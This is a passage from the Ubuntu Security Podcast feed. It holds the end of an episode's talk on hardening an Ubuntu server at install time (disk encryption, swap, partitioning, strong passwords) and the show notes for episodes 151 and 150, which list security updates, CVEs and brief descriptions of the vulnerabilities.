also, while you are installing your system. Let&rsquo;s get prepared for the
Ubuntu big bang and talk about what needs to happen before our binary
universe can start to exist and securely function inside our CPUs and hard
drives.</p>
<p>During an Ubuntu install you will make a few choices, such as whether or
not you want to encrypt data in your disk. If you are not the one
installing your own system, and you have an already running basic Ubuntu
system in a cloud service platform, for example, this might not be
something possible for you. However, if you do have the chance to apply
this, it is a hardening measure that can be used to protect all data being
saved in your hard drive. Of course, we need to consider that not all
situations might fit well with this, as, for example, a server that forces
the system to reboot frequently would require a password every time at
system startup, something that one might not want to do, or be available to
do, every single time, specially considering a situation where a completely
automated system is the main goal to be achieved here. It is also important
to consider that encrypting your hard drive might affect general file I/O
performance, since data being read from the disk needs to be decrypted
everytime, before being presented to the user or to the system for further
processing, and data that will be written to the system needs to be
encrypted before it is sent permanently to the hard drive. However, if none
of those cases concerns you at all, the question here might be: why NOT
encrypt your hard drive?  If your hardware allows it, making the process
fast, it might even be worth it despite the delay you can have due to the
necessary encryption and decryption operations being performed. Either way,
your data can be protected from those that might want to access it without
authorization. Do not kid yourself by thinking that hackers will always
stay behind a screen, as there are the very bold who might just think that
by stealing your hard drive they will get what they need. Without a
password, though, hackers can connect the disk to whatever computer they
like, but the data will remain encoded and unreadable. Remember though,
full disk encryption will NOT protect data in transit, also known as data
you sent through the wires or through the air, via the World Wide Web, to
other devices around the world. Disk encryption, as the name suggests, is
local to the disk which is associated with your own device. Oh, also do be
aware that the password that is used to encrypt the disk cannot be lost or
else, you might be your own worst enemy and lose your data which becomes
nearly impossible to crack cipher text.</p>
<p>Still talking about disk configurations during the installation process, do
consider creating a swap partition when setting up your system. The swap
partition is essentially used by the Ubuntu System as if it were
RAM. Therefore, if your RAM is filled up completely, the swap partition,
which is actually a part of the hard drive, will be used rather than the
RAM memory space to perform operations. necessary A swap partition can also
be used to make more RAM space available during a certain point in
processing time, said space being provided for data that is more relevant
or is being used more frequently. Data that is being less used, less
referenced, can therefore be moved to swap space instead of being left in
the ever busy, constantly used RAM. The swap will act as an extension of
your RAM, but do note, it is not as efficient as RAM, since it is actually
your hard drive pretending to be something that it is not: a volatile
memory device. Setting up a swap partition, however, can be very useful to
increase performance in your server. As previously mentioned, swap space
can be used to store data that is not all that frequently accessed, opening
up space in RAM for more regularly accessed information. Since data in the
swap is not being used constantly, the delay you would have when performing
I/O operations on it becomes less of an issue, and you essentially gain
more RAM space to process whatever your server needs to process. And, you
know, even if people do forget it sometimes, remembering about it only when
they suffer a massive DoS attack, availability is one of the 3 pillars of
cyber security, so preparing for that in order to guarantee a system with
better performance is valuable. Another big advantage of having swap lies
in the fact that you as a system administrator might have more time to
react to possible memory issues when your server is facing them. When you
run out of memory and you don&rsquo;t have swap, you risk having your system
suddenly crash and not only losing all data that was in RAM, but having
your service be out of reach for whoever knows how long. You can also have
OOM killer go and kill your most important process because you
are&hellip;running out of memory…and it doesn&rsquo;t even have the courtesy of asking
you if you are ok with it. Just rude! If you set up your swap space to at
least the size of your largest process though and you monitor your system,
you are able to detect possible issues by analyzing swap space usage, and
then you can most likely avoid many undesired service and system
crashes. However, do not forget: setting swap can boost your system
performance, as it can hinder it if you don&rsquo;t implement things
correctly. Your main volatile memory source should be your RAM, and the
swap partition will not be a substitute for it. Therefore, if you have
little RAM and over encumber your system, you won&rsquo;t make it any faster by
using swap, as the hard drive will be used to process that overflowing
amount of data that should be being processed primarily by your RAM.  The
idea is to use swap as a complimentary performance measure to your
appropriate RAM sized system. If using swap memory, don&rsquo;t forget to
configure how this extra memory space will be used together with your RAM,
by setting the &lsquo;swapiness&rsquo; metric, for example, which will tell the kernel
how aggressively it will swap memory pages in the system when
necessary. Once again, setting too much of a high value might make your
system inefficient as you start making your kernel believe that the
harddrive is actually RAM - the perfect disguise - but setting a low value
might also not give you the best performance possible. Each case will be
its own, so know your system and your needs, and act accordingly.</p>
<p>Our install happens on our disk, so, unfortunately I must tell you that
once again we will be checking out disk settings we can consider when
creating our hardened Ubuntu server. Cheers to our disks! Installing all of
the system in one single partition tends to be a lot easier and a lot
faster. However, we are not looking for easy here, we are looking for
secure, so let&rsquo;s get out of the one single partition and out of our comfort
zones and possibly separate our system directories into different
partitions. Having /boot in a separate partition is useful to avoid not
being able to log into a system after the current kernel image has run
across issues. The backup kernel images will be available and you might be
able to do a quicker recovery that won&rsquo;t require connecting an external
device in, or removing your own in order to fix what has been broken in the
OS. In case you encrypt your / (root) partition, you will need to perform
this regardless, or else, your OS won&rsquo;t boot. Encrypted code might be cool
looking but it&rsquo;s not exactly functional considering a situation where you
need to know what are the basic instructions that will allow you to get the
operating system up and running. Encrypting /boot together with / (root)
would be the same as hearing the &ldquo;ready, set, go&rdquo; at a car race and staying
stuck in place because you just remembered you put a boot in your
wheel. The locked boot is stopping you from moving the car forward and
getting it where you need it to be, and, considering /boot outside of the
analogy, it&rsquo;s stopping you from getting your computer to execute your
operating system because it’s encrypted. Therefore, if you encrypt your
hard drive, as previously suggested, you already get to escape from the old
boring one partition scheme. That being said with this very convenient
analogy, let&rsquo;s get back to it and discuss the other partitioning options
you might have and that you can apply to your system in order to make it
more efficient and more secure, options which include, for example, putting
/tmp in a separate partition. This is most likely a good call, especially
considering that world-writable /tmp is a common target for
attackers. Servers that might use /tmp for storage of, as the name
suggests, temporary files could cause a self DoS in case this directory is
filled up with various large files. If the directory is in a different
partition, however, only that specific partition will fill up and not the
entire system storage instead. Other processes using other directories in
your system are unaffected and only the process filling up /tmp is
terminated. It is also a lot easier to manage a filled up /tmp partition
than it is the entire system. Plus, different permissions can be set for
this specific partition later on, but we will discuss this soon enough,
albeit not now. Separating the /home and the /var directories from the rest
of the system also shares these advantages. Leaving these directories in
their own separate &ldquo;drawers&rdquo; inside the closet that is our hard drive might
be an interesting choice in order to avoid necessary space to be taken up
by a file that might not be essential for the workings of the server. The
/home directory will contain user files, and we don&rsquo;t trust users, and the
/var directory might get filled up completely with a huge amount of logs,
for example. Filling up the logs might be an attack of choice made by some
hacker out there, but if you created a separate partition, you were
prepared for it. Having smaller partitions also makes for faster file
searches in the system, which might be a valid performance boost for your
IT infrastructure. If you plan to share resources through the network, have
these resources be connected to a directory mounted in a separate
partition, as you can have more permissive access control rules in the
shared partition, but keep the rigorous one in all others that might
contain sensitive information, which is in itself another advantage:
different partitions, different permissions during mount time. However, we
will go into more detail about this later on, as I already mentioned. The
point here is: separate partitions are separate filesystems, and,
therefore, the OS will not behave in the same way as it would if all data
were to be stored under a single partition…a single filesystem. All of that
being said, it will require more management than a system that has only one
partition, and space usage might not be the most efficient when you
establish limits to each directory. However, if it is feasible for your
needs, it might be a good way to avoid some issues…security issues.</p>
<p>Up next, I say this everytime and I will never get tired of saying it:
strong passwords, people! Strong passwords! Whenever creating the first
user for your Ubuntu system, which will happen during the install process,
do not use your birthday as your password. Or your dog&rsquo;s name&hellip;or any 6
letter word followed by the digits that are the current year. Easy to
remember, easy to hack. The first step to avoid being hacked is not wanting
to be hacked, and forgive you me if I am being too blunt, but setting up
lazy passwords and not expecting it to be a problem is like eating rotten
food and expecting to not get sick: you can wish all you want, but the
outcome will not be positive for you, my friend&hellip;and to your closest loved
ones involved. So&hellip;strong passwords, please, and non-expired food.</p>
<p>Our system is installed. BIG. BANG. Our Ubuntu OS universe now exists after
we set everything up so that it looks just right for our security
needs. All is not done, however, since after the big-bang, the galaxy and
more specifically Earth, had to go through a lot of steps before it was
ready to host life, which is our main goal here: host life in the form of
executable, network service providing code. We now have galaxies, stars,
planets, and all necessary to maybe create life in the future, but first
things first, we need our huge ball of fire to be tweaked a little bit,
since life as we know it will not be born in such an unsafe, or might I
say, insecure environment. Let&rsquo;s then make it secure so that we can start
thinking about giving it some life, or, in our case, installing some
software, developing customized code, setting up frameworks, all that good
stuff that makes developers go crazy with excitement.</p>
<p>I will, however, keep you on your toes, and continue talking more about
this subject in another episode only! So stay tuned to the podcast to
continue on this Ubuntu hardening journey with me, and while you wait for
what is to come, feel free to share your thoughts in any of our social
media platforms, as your opinion is always welcome! I await your return to
the podcast in the following weeks so that we can once again share
information, but for now I bid you all farewell and until next time! Bye!</p>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E152.mp3" length="18275840" type="audio/mpeg" /><itunes:duration>1685</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 151
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-151/</link>
          <pubDate>Fri, 04 Mar 2022 15:31:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>b49a5da81cbdc2ad450faaa0b4df18a3e231b91427796591b5e069a977d74a089c0fd87a893352b109b0fac7a1c34033b04bcbb2b30acb8eff7be5a7ccb0b442</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 151</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we do the usual round-up of security vulnerability fixes for the
  various Ubuntu releases, plus we discuss enabling PIE for Python and
  preview some upcoming content on Ubuntu system hardening as well.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we do the usual round-up of security vulnerability fixes for the
  various Ubuntu releases, plus we discuss enabling PIE for Python and
  preview some upcoming content on Ubuntu system hardening as well.
  </itunes:summary>
        <description>  This week we do the usual round-up of security vulnerability fixes for the
  various Ubuntu releases, plus we discuss enabling PIE for Python and
  preview some upcoming content on Ubuntu system hardening as well.
  </description>
        <googleplay:description>  This week we do the usual round-up of security vulnerability fixes for the
  various Ubuntu releases, plus we discuss enabling PIE for Python and
  preview some upcoming content on Ubuntu system hardening as well.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we do the usual round-up of security vulnerability fixes for the
various Ubuntu releases, plus we discuss enabling PIE for Python and
preview some upcoming content on Ubuntu system hardening as well.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>44 unique CVEs addressed</p>
<h3 id="usn-5292-4-snapd-regression-00-52">[<a href="https://ubuntu.com/security/notices/USN-5292-4">USN-5292-4</a>] snapd regression [00:52]</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-44731">CVE-2021-44731</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44730">CVE-2021-44730</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4120">CVE-2021-4120</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3155">CVE-2021-3155</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-149/">Episode 149</a> - another regression with fish shell</li>
</ul>
<h3 id="usn-5303-1-php-vulnerability-01-20">[<a href="https://ubuntu.com/security/notices/USN-5303-1">USN-5303-1</a>] PHP vulnerability [01:20]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-21708">CVE-2021-21708</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF - PoC exists which shows the ability to crash PHP interpreter via a
crafted database query - possible RCE as well</li>
</ul>
<h3 id="usn-5304-1-policykit-vulnerability-01-40">[<a href="https://ubuntu.com/security/notices/USN-5304-1">USN-5304-1</a>] PolicyKit vulnerability [01:40]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-4115">CVE-2021-4115</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>fd exhaustion - send 2 requests and cause the first one to fail - leaks
the fd - eventually polkit runs out of fds and crashes - will be
restarted by systemd so impact is low</li>
</ul>
<h3 id="usn-5305-1-mariadb-vulnerabilities-02-17">[<a href="https://ubuntu.com/security/notices/USN-5305-1">USN-5305-1</a>] MariaDB vulnerabilities [02:17]</h3>
<ul>
<li>10 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24052">CVE-2022-24052</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24051">CVE-2022-24051</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24050">CVE-2022-24050</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24048">CVE-2022-24048</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-46668">CVE-2021-46668</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-46665">CVE-2021-46665</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-46664">CVE-2021-46664</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-46663">CVE-2021-46663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-46661">CVE-2021-46661</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-46659">CVE-2021-46659</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Several security issues - latest upstream point releases</li>
<li>10.3.34 for 20.04 LTS</li>
<li>10.5.15 for 21.10</li>
</ul>
<h3 id="usn-5306-1-webkitgtk-vulnerabilities-02-44">[<a href="https://ubuntu.com/security/notices/USN-5306-1">USN-5306-1</a>] WebKitGTK vulnerabilities [02:44]</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-22592">CVE-2022-22592</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22590">CVE-2022-22590</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22589">CVE-2022-22589</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various issues in webkit fixed</li>
</ul>
<h3 id="usn-5307-1-qemu-vulnerabilities-02-58">[<a href="https://ubuntu.com/security/notices/USN-5307-1">USN-5307-1</a>] QEMU vulnerabilities [02:58]</h3>
<ul>
<li>11 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0358">CVE-2022-0358</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4158">CVE-2021-4158</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3930">CVE-2021-3930</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3748">CVE-2021-3748</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3713">CVE-2021-3713</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3682">CVE-2021-3682</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3546">CVE-2021-3546</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3545">CVE-2021-3545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3544">CVE-2021-3544</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20203">CVE-2021-20203</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20196">CVE-2021-20196</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various issues - integer overflow, NULL ptr derefs, memory leaks and
disclosures in vhost-user GPU driver, crash or possible code-exec in USB
redirector device emulation etc</li>
</ul>
<h3 id="usn-5309-1-virglrenderer-vulnerabilities-03-28">[<a href="https://ubuntu.com/security/notices/USN-5309-1">USN-5309-1</a>] virglrenderer vulnerabilities [03:28]</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0175">CVE-2022-0175</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0135">CVE-2022-0135</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Virtual GPU for KVM</li>
<li>info leak and possible OOB write</li>
</ul>
<h3 id="usn-5310-1-gnu-c-library-vulnerabilities-03-48">[<a href="https://ubuntu.com/security/notices/USN-5310-1">USN-5310-1</a>] GNU C Library vulnerabilities [03:48]</h3>
<ul>
<li>12 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-23219">CVE-2022-23219</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23218">CVE-2022-23218</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3999">CVE-2021-3999</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3998">CVE-2021-3998</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35942">CVE-2021-35942</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-27645">CVE-2021-27645</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6096">CVE-2020-6096</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3326">CVE-2021-3326</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29562">CVE-2020-29562</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27618">CVE-2020-27618</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-25013">CVE-2019-25013</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-10228">CVE-2016-10228</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Usual mix of issues in libc - OOB read / writes - crash / possible code
execution - in various modules - character encoding handling in iconv,
netgroup lookups via nscd daemon, <code>wordexp()</code> / <code>realpath()</code> / <code>getcwd()</code>
functions etc</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="python-plus-pie-04-45">Python + PIE? [04:45]</h3>
<ul>
<li><a href="https://bugs.launchpad.net/ubuntu/+source/python2.7/+bug/1452115">https://bugs.launchpad.net/ubuntu/+source/python2.7/+bug/1452115</a></li>
<li>Request since 2015 to enable this</li>
<li>When compiled as PIE enables to use exec ASLR which can frustrate ROP
exploits etc</li>
<li>Performance testing shows this to have no impact</li>
<li>Coordinating with foundations team to try and land for Ubuntu 22.04 LTS
as a FFe</li>
</ul>
<h3 id="security-advice-for-running-your-own-server-07-02">Security advice for running your own server [07:02]</h3>
<ul>
<li><a href="https://discourse.ubuntu.com/t/basic-security-advice-for-running-your-own-server/26786">https://discourse.ubuntu.com/t/basic-security-advice-for-running-your-own-server/26786</a></li>
</ul>
<h3 id="hiring-07-33">Hiring [07:33]</h3>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180/security-engineer-ubuntu-remote">https://canonical.com/careers/2925180/security-engineer-ubuntu-remote</a></li>
<li>Home based, worldwide</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E151.mp3" length="7468558" type="audio/mpeg" /><itunes:duration>559</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 150
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-150/</link>
          <pubDate>Fri, 25 Feb 2022 14:40:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>682cb3a0b2124c939876f020415aa419fe4d305d424cfde0f437f09c806b6f5ceffb297f6187437d7043263abddcfa9c3d598afb855c48beebfbd410c08a00fa</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 150</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Ubuntu 20.04.4 LTS is released, plus we talk about Google Project Zero's
  metrics report as well as security updates for the Linux kernel, expat,
  c3p0, Cyrus SASL and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Ubuntu 20.04.4 LTS is released, plus we talk about Google Project Zero's
  metrics report as well as security updates for the Linux kernel, expat,
  c3p0, Cyrus SASL and more.
  </itunes:summary>
        <description>  Ubuntu 20.04.4 LTS is released, plus we talk about Google Project Zero's
  metrics report as well as security updates for the Linux kernel, expat,
  c3p0, Cyrus SASL and more.
  </description>
        <googleplay:description>  Ubuntu 20.04.4 LTS is released, plus we talk about Google Project Zero's
  metrics report as well as security updates for the Linux kernel, expat,
  c3p0, Cyrus SASL and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Ubuntu 20.04.4 LTS is released, plus we talk about Google Project Zero&rsquo;s
metrics report as well as security updates for the Linux kernel, expat,
c3p0, Cyrus SASL and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>62 unique CVEs addressed</p>
<h3 id="usn-5292-2-usn-5292-3-snapd-vulnerabilities-00-44">[<a href="https://ubuntu.com/security/notices/USN-5292-2">USN-5292-2</a>, <a href="https://ubuntu.com/security/notices/USN-5292-3">USN-5292-3</a>] snapd vulnerabilities [00:44]</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-44731">CVE-2021-44731</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44730">CVE-2021-44730</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4120">CVE-2021-4120</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3155">CVE-2021-3155</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-149/">Episode 149</a></li>
</ul>
<h3 id="usn-5294-1-usn-5294-2-linux-kernel-vulnerabilities-01-38">[<a href="https://ubuntu.com/security/notices/USN-5294-1">USN-5294-1</a>, <a href="https://ubuntu.com/security/notices/USN-5294-2">USN-5294-2</a>] Linux kernel vulnerabilities [01:38]</h3>
<ul>
<li>8 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-22942">CVE-2022-22942</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0330">CVE-2022-0330</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43975">CVE-2021-43975</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4202">CVE-2021-4202</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4155">CVE-2021-4155</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4083">CVE-2021-4083</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39685">CVE-2021-39685</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22600">CVE-2021-22600</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 - focal GA + clouds</li>
<li>Usual sorts of issues - double-free (UAF) in packet network protocol, OOB
R/W in USB Gadget, race condition in Unix domain sockets - UAF, XFS info
leak, NFC race -&gt; UAF, Intel GPU TLB flush missing - DoS/RCE, VMWare vGPU
missing cleanup on errors - stale entries in fd table - info leak /
privesc</li>
</ul>
<h3 id="usn-5295-1-usn-5295-2-linux-kernel--hwe--vulnerabilities-02-57">[<a href="https://ubuntu.com/security/notices/USN-5295-1">USN-5295-1</a>, <a href="https://ubuntu.com/security/notices/USN-5295-2">USN-5295-2</a>] Linux kernel (HWE) vulnerabilities [02:57]</h3>
<ul>
<li>5 CVEs addressed in Impish (21.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-22942">CVE-2022-22942</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0330">CVE-2022-0330</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4155">CVE-2021-4155</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4083">CVE-2021-4083</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22600">CVE-2021-22600</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.13 - impish GA + focal HWE</li>
</ul>
<h3 id="usn-5297-1-linux-kernel--gke--vulnerabilities-03-17">[<a href="https://ubuntu.com/security/notices/USN-5297-1">USN-5297-1</a>] Linux kernel (GKE) vulnerabilities [03:17]</h3>
<ul>
<li>7 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-22942">CVE-2022-22942</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0330">CVE-2022-0330</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43975">CVE-2021-43975</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4202">CVE-2021-4202</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4155">CVE-2021-4155</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4083">CVE-2021-4083</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39685">CVE-2021-39685</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 gke specific kernel - focal + bionic</li>
</ul>
<h3 id="usn-5298-1-linux-kernel-vulnerabilities-03-29">[<a href="https://ubuntu.com/security/notices/USN-5298-1">USN-5298-1</a>] Linux kernel vulnerabilities [03:29]</h3>
<ul>
<li>12 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-22942">CVE-2022-22942</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0330">CVE-2022-0330</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4202">CVE-2021-4202</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4155">CVE-2021-4155</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4083">CVE-2021-4083</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39685">CVE-2021-39685</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28715">CVE-2021-28715</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28714">CVE-2021-28714</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28713">CVE-2021-28713</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28712">CVE-2021-28712</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28711">CVE-2021-28711</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22600">CVE-2021-22600</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 bionic GA + xenial HWE + trusty azure</li>
</ul>
<h3 id="usn-5299-1-linux-kernel-vulnerabilities-03-46">[<a href="https://ubuntu.com/security/notices/USN-5299-1">USN-5299-1</a>] Linux kernel vulnerabilities [03:46]</h3>
<ul>
<li>13 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-45485">CVE-2021-45485</a> <!-- raw HTML omitted --></li>
